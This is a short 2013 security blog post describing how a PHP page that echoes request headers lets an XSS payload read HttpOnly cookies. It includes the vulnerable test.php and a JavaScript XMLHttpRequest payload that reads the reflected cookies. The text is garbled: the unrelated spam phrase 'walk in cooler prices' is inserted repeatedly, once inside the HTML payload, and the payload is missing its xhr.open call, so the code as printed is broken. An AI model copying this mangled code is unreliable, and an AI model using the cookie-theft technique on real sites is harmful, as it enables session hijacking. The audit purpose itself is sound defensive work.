Monday, November 4, 2013

android android security authentication backtrack buffer buffer overflow walk in cooler prices G++ G

HttpOnly is a great way to stop XSS attacks from stealing walk in cooler prices sessions. Usually. When you do an audit, make sure you don’t see anything like the “test.php” code below. <?php //test.php setcookie("test", "test", null, "/", null, null, true); foreach (getallheaders() as $name => $value) { echo "$name: $value\n"; } ?>
If you do, there’s a very simple way to bypass HttpOnly. That’s because you’re leaking cookies from the headers into the HTTP body. The same issue occurs when you print things from “apache_request_headers” in php. I’m sure this happens in other frameworks/languages. <html> walk in cooler prices <head> <script> //some XSS! function cookieJar(){ alert(xhr.responseText) } var xhr = new XMLHttpRequest(); xhr.withCredentials = true; xhr.onreadystatechange = cookieJar;"GET", "/test.php", true); xhr.send(null); </script> </head> </html>
android android security authentication backtrack buffer buffer overflow walk in cooler prices G++ GCC hash heap overflow mobile mobile hacking mobile security netsec random token salt security sqli sql injection stack overflow stack smashing

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